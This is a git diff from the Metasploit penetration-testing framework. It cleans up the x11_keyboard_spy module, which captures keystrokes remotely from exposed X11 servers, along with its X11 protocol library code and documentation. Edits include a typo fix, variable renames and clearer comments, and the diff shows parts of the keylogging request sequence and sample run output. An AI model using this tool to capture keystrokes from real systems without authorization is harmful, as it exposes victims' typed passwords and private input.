diff --git a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md index f545f665d1a8..c6a52cf9e5ec 100644 --- a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md +++ b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md @@ -126,7 +126,7 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run [*] 127.0.0.1:6000 - Establishing TCP Connection [*] 127.0.0.1:6000 - [1/9] Establishing X11 connection -[-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data +[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data [+] 127.0.0.1:6000 - Successfully established X11 connection [*] 127.0.0.1:6000 - Version: 11.0 [*] 127.0.0.1:6000 - Screen Resolution: 958x832 diff --git a/lib/msf/core/exploit/remote/x11/extension.rb b/lib/msf/core/exploit/remote/x11/extension.rb index 460770cf34e5..ae93c51aabd8 100644 --- a/lib/msf/core/exploit/remote/x11/extension.rb +++ b/lib/msf/core/exploit/remote/x11/extension.rb @@ -16,8 +16,8 @@ def query_extension(extension_name, call_count) result = nil begin packet = sock.timed_read(X11QueryExtensionResponse.new.num_bytes) - # leaving here, good for debugging - packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join + # for debugging, print the following line + # puts packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join result = X11QueryExtensionResponse.read(packet) rescue StandardError => e vprint_bad("Error (#{e}) processing data: #{packet.bytes.map { |b| %(\\x) + b.to_s(16).rjust(2, '0') }.join}") diff --git a/lib/rex/proto/x11/window.rb b/lib/rex/proto/x11/window.rb index a789ad572a00..c4a04ed7fd5d 100644 --- a/lib/rex/proto/x11/window.rb +++ b/lib/rex/proto/x11/window.rb @@ -217,8 +217,8 @@ def initialize(width, height, image_data, color_data) @color_data = color_data # from X11GetColorsResponse end - self.from_replies(width, height, image_reply, color_reply) - self.new(width, height, image_reply.image_data, color_reply.colors) + def self.from_replies(width, height, image_reply, color_reply) + new(width, height, image_reply.image_data, color_reply.colors) end def create_image diff --git a/modules/auxiliary/gather/x11_keyboard_spy.rb b/modules/auxiliary/gather/x11_keyboard_spy.rb index 845ec4af120a..e0d25d1237f2 100644 --- a/modules/auxiliary/gather/x11_keyboard_spy.rb +++ b/modules/auxiliary/gather/x11_keyboard_spy.rb @@ -87,7 +87,7 @@ def build_sym_key_map(map_data) if syms.n_syms == 0 key_map[key_code] = nil else - sym = map_data.key_map_array[keysym_index].key_sym_array[0].syms + sym = map_data.key_map_array[keysym_index].key_sym_array[0] begin character = sym.chr character = '[space]' if character == ' ' @@ -129,7 +129,7 @@ def translate_keystroke(bit_array_of_keystrokes, key_map, last_key_press_array) end def run - query_extension_calls = 0 + query_extension_call_counter = 0 @keylogger_log = '' @keylogger_print_buffer = '' @@ -147,7 +147,7 @@ def run end vprint_status('[2/9] Checking on BIG-REQUESTS extension') - big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_calls) + big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_call_counter) fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if big_requests_plugin.nil? if big_requests_plugin.present == 1 print_good(" Extension BIG-REQUESTS is present with id #{big_requests_plugin.major_opcode}") @@ -173,7 +173,7 @@ def run sock.put(gc_header.to_binary_s + gc_body.to_binary_s + gp_header.to_binary_s + - gp_body.to_binary_s) # not sure why we do this + gp_body.to_binary_s) # not sure why we also do a get property, but it emulates how the library works # nothing valuable in the response, just make sure we read it in to # confirm its expected data and not leave the response on the socket @@ -188,7 +188,7 @@ def run end vprint_status('[5/9] Checking on XKEYBOARD extension') - xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_calls) + xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_call_counter) fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if xkeyboard_plugin.nil? if xkeyboard_plugin.present == 1 print_good(" Extension XKEYBOARD is present with id #{xkeyboard_plugin.major_opcode}") @@ -205,24 +205,25 @@ def run full_key_types: 1, full_key_syms: 1, full_modifier_map: 1).to_binary_s) - data = sock.get_once(-1, 1) + map_raw_data = sock.get_once(-1, 1) + # for debugging packet output, uncomment following line # puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join - map_data = X11GetMapReply.read(data) + map_data = X11GetMapReply.read(map_raw_data) vprint_status('[8/9] Enabling notification on keyboard and map') sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, affect_which_new_keyboard_notify: 1, affect_new_keyboard_key_codes: 1, affect_new_keyboard_device_id: 1).to_binary_s + - X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, - affect_which_map_notify: 1, - affect_map_key_types: 1, - affect_map_key_syms: 1, - affect_map_modifier_map: 1, - map_key_types: 1, - map_key_syms: 1, - map_modifier_map: 1).to_binary_s) # not sure what this does - sock.get_once(-1, 1) + X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, + affect_which_map_notify: 1, + affect_map_key_types: 1, + affect_map_key_syms: 1, + affect_map_modifier_map: 1, + map_key_types: 1, + map_key_syms: 1, + map_modifier_map: 1).to_binary_s) # not sure what this does, but emulates x11 c library + # this request doesn't receive any response data vprint_status('[9/9] Creating local keyboard map') key_map = build_sym_key_map(map_data)